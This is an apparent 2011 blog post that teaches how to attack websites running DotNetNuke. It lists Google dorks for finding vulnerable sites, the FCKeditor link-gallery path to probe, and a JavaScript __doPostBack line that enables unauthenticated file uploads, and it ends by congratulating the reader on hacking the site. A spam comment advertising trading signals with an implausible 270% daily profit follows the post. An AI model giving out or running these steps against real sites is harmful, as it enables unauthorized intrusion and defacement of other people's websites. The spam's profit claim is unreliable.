Friday, June 3, 2011

DNN (DotNetNuke) Hacking

Hacking Websites With DotNetNuke

Introduction
Today you will learn about a new web hacking technique known as DNN (standing for DotNetNuke). DNN is a new and growing form of hacking, that has recently become well known and popular. Its easy compared to hacking sites using SQLI, XSS, RFI etc.

In this lesson you will learn how to find your target, enter the website, and upload your files.

DotNetNuke is an open source platform for developing websites using Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.


Step 1: Google Dork
The first step is very easy. We simply use a Google Dork to find a target.
Two dorks are:
Code:
inurl:”/portals/0″ site:.com
inurl:/tabid/36/language/en-US/Default.aspx
(I'm assuming you already know how to use Google Dorks - if not, there is a guide here)
You can change the domain (.com) to something else, if you'd prefer.

Step 2: Check for the Vulnerability
Place the following after the web URL/address:
Code:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For example, if you found a target site called targetsite.com you would have:
Code:
www.targetsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You should get a page something like this:


If you do, it means the site is vulnerable.

Step 3: Hacking the Site
Choose the third option (A File On Your Site) and then paste in the following JavaScript code to your address bar.
Code:
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
You will then be allowed to upload files on this website, you can upload txt, swf, jpg, gif, pdf files.

After uploading the files you're file will be found at domain/portals/0/yourfile.extension
Or in our case (if we uploaded a text file called "hax.txt"):
Code:
www.targetsite.com/portals/0/hax.txt
Congratulations! You hacked it!

1 comment:

  1. QUANTUM BINARY SIGNALS

    Get professional trading signals sent to your cell phone daily.

    Follow our trades NOW and profit up to 270% per day.

    ReplyDelete